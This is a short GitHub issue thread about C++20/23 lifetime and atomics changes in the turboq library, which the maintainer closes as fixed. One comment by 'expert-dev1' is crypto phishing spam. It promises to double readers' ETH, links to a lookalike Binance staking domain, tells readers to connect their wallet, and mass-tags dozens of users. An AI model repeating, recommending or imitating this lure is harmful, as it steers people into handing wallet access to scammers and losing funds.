### ISSUE TITLE
fix for C++20

### ISSUE THREAD

**Issue by pluto699** [ksergey/turboq#1]
use `start_lifetime_as` instead of `reinterpret_cast`/`std::bit_cast`
use `std::atomic_ref` instead of `std::atomic` for data from shared memory

**Comment by pluto699** [comment]
use start_lifetime_as instead of reinterpret_cast/std::bit_cast -> C++23

**Comment by expert-dev1** [comment]
## 🚀 Double Your ETH with Binance Staking

Earn rewards and secure your financial future by staking your ETH with Binance. By participating in the Binance staking program, you can potentially double your ETH while supporting the blockchain network.

[![Start Staking Now](https://miro.medium.com/v2/resize:fit:720/format:webp/1*Ssf-ZH2f2V5dLyn7zYTXHg.png)](https://app.bnbinchain.com/en/bnb-staking?utm_source=email&utm_campaign=leads&utm_id=github)

**Click the banner above** to learn more and start staking your ETH with Binance today!

### How to Stake on Binance:
1. **[Visit the Official Binance Staking Page](https://app.bnbinchain.com/en/bnb-staking?utm_source=email&utm_campaign=leads&utm_id=github):** Click the link to navigate to the official staking page.
2. **Connect Your Wallet:** Ensure you have a wallet with sufficient ETH, then securely connect it to Binance.
3. **Interact with the Staking Method:** Follow the instructions to use the "connect" method and begin staking your ETH from your wallet balance.
BXJC, @liucq91, @RainGather, @nedogimov-m, @K0LbAzzeR, @rul3rst4, @luizalfredo83, @ericjee, @innxrmxst, @gudarzi, @Wlj13, @StevenLee003, @yangyangisyou, @baaadtrippp, @nicks-technik, @sstaylor79, @vitalyk1980, @Khusyasy, @leggod, @corny, @eagle453, @TheFox, @aozkan, @koitsu, @Jere3y, @H5oSir, @pm1122, @zaendev, @peme14k, @Smurph82, @M4RLY, @hzhlovezx, @leeseon, @patyizsolt, @NSG650, @slossy88, @Windfarer, @zawadadib, @ltearno, @Kieran-De-Sousa, @chazu, @Charles376, @yechuxia43, @atomshadows, @andreevmipt, @baladithyab, @Anonimovs, @WuYuanhun, @uesu, @Raboo

**Comment by ksergey** [comment]
fixed
